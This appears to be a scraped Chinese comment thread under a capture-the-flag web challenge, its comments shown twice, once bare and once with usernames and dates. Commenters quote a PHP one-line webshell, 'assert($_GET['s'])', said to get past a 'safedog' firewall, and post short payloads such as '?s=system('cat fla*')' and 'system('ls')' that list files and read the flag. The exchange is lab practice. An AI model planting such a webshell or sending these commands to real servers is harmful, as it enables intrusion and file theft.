就这?
nnm,退钱。
assert($_GET['s']) 这就是一句话过狗
就离谱 ?system(dir) .........文件名真不错,爱了爱了
重点是描述的话,然后是小马用GET构造请求
/?s=system('cat fla*')
?我还以为作者要整条狗来看门呢,结果直接$_GET['s']=system('ls')就啥都出来了......
根据描述应该应该是一个一句话木马,直接提交命令system(ls),然后在直接访问flag文件
用system(dir)来过这个题目,是作者本来的思路吗。看评论好像大家用的方法还挺多种的。
不多说了,套娃了解下
...
评论
树木有点绿 2年前
举报
就这?
AdminFuck 3年前
举报
nnm,退钱。
zxmals 3年前
举报
assert($_GET['s']) 这就是一句话过狗
answer 3年前
举报
就离谱 ?system(dir) .........文件名真不错,爱了爱了
iFound 3年前
举报
重点是描述的话,然后是小马用GET构造请求
god536 3年前
举报
/?s=system('cat fla*')
a2cai 3年前
举报
?我还以为作者要整条狗来看门呢,结果直接$_GET['s']=system('ls')就啥都出来了......
ximing 3年前
举报
根据描述应该应该是一个一句话木马,直接提交命令system(ls),然后在直接访问flag文件
shan 3年前
举报
用system(dir)来过这个题目,是作者本来的思路吗。看评论好像大家用的方法还挺多种的。
yinyue 3年前
举报
不多说了,套娃了解下